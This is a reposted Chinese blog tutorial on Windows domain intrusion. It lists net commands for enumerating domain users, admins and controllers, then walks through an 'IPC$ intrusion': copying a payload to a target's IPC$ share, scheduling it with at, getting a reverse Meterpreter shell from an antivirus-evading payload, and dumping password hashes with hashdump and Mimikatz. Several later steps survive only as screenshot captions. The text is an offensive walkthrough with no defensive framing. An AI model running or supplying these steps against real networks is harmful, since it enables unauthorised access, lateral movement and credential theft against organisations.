轉載請註明出處：https://blog.csdn.net/l1028386804/article/details/85995503

一、域操作相關的命令

1.檢視域使用者

net user/domain

2.檢視有幾個域

net view/domain

3.檢視域內的主機

net view/domain: XXX

4.檢視域裡面的組

net group/domain

5.檢視域內所有的主機名

net group "domain computers" /domain

6.檢視域管理員

net group "domain admins" /domain

7.檢視域控制器

net group "domain controllers" /domain

8.檢視企業管理組

net group "enterprise admins" /domain

9.檢視時間伺服器

nettime/domain

二、IPC$入侵

IPC$入侵，即通過使用Windows系統預設啟動的IPC$共享獲得計算機控制權的入侵，在內網中及其常見。
假設現在有一臺IPC$主機：127.0.0.25，輸入以下命令。

#連線127.0.0.25的IPC$共享：
D:>net use \127.0.0.25\ipc$
#複製srv.exe到目標主機
D:>copy srv.exe \127.0.0.25\ipc$ 
#查時間
D:>net time\127.0.0.25
#用at命令在10點50分啟動srv.exe(注意這裡設定的時間比主機時間快)
D:>at \127.0.0.25 10:50 srv.exe
 

上述命令中的at就是讓計算機在指定的時間做指定事情的命令(例如執行程式)

這裡把免殺的Payload上傳到PAVMSEP131伺服器，然後利用at命令啟動Payload，反彈回Meterpreter Shell
將木馬複製到目標伺服器

檢視系統時間

使用at命令啟動木馬

接著返回handler監聽，可以看到反彈成功了，我們獲得了PAVMSEP131伺服器的Meterpreter Shell
反彈成功

下面看看PAVMSEP131伺服器的資訊和現在的許可權
檢視系統資訊

可以看到有SYSTEM許可權，說明既可以使用Mimikatz等工具，也可以輸入 run post/windows/gather/hashdump來抓Hash
在用Mimikatz抓Hash前要注意一點：如果伺服器安裝的是64位作業系統，要把Mimikatz的程序遷移到一個64位的程式程序中，才能檢視64位作業系統的密碼明文，在32位系統中就沒有這個限制。

這裡使用Mimikatz抓Hash

上傳Mimikatz

抓取Hash

檢視抓到的域使用者的許可權